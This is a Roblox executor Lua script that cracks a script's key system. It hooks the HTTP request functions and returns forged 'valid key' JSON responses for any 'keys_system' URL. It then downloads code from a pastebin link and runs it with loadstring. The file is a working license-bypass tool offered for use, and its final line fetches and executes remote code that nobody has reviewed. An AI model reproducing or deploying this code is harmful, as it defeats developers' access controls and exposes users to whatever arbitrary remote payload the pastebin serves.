-- Made by Project X (https://discord.gg/dFqH5jtpqt) local HttpService = game:GetService("HttpService") if not getgenv().GlobalHeartbeatCount then getgenv().GlobalHeartbeatCount = 2 end local function extractTokenFromUrl(url) local token = url:match("key=eq%.([%w%-]+)") return token end local function getISOTimestamp(offset) local t = os.time() + (offset or 0) return os.date("!%Y-%m-%dT%H:%M:%S+00:00", t) end local req = request local function reqy(Data) if Data and Data.Url and Data.Url:find("keys_system") then local dynamicToken = extractTokenFromUrl(Data.Url) if not dynamicToken then dynamicToken = "Cracked" end getgenv().GlobalHeartbeatCount = getgenv().GlobalHeartbeatCount + 1 local createdAt = getISOTimestamp(-3600) local heartbeatAt = getISOTimestamp(45) local responseBody = { { ["key"] = dynamicToken, ["created_at"] = createdAt, ["last_heartbeat"] = heartbeatAt, ["ip_address"] = "12.132.145.121", -- Is a random ip ["heartbeat_count"] = getgenv().GlobalHeartbeatCount } } local jsonBody = HttpService:JSONEncode(responseBody) return { Success = true, StatusCode = 200, Headers = {["Content-Type"] = "application/json"}, Body = jsonBody } end return req(Data) end if getgenv then local g = getgenv() g.request = reqy g.http = {request = reqy} g.http_request = reqy end if _G.syn then _G.syn.request = reqy end loadstring(game:HttpGet("https://pastebin.com/raw/Piw5bqGq"))()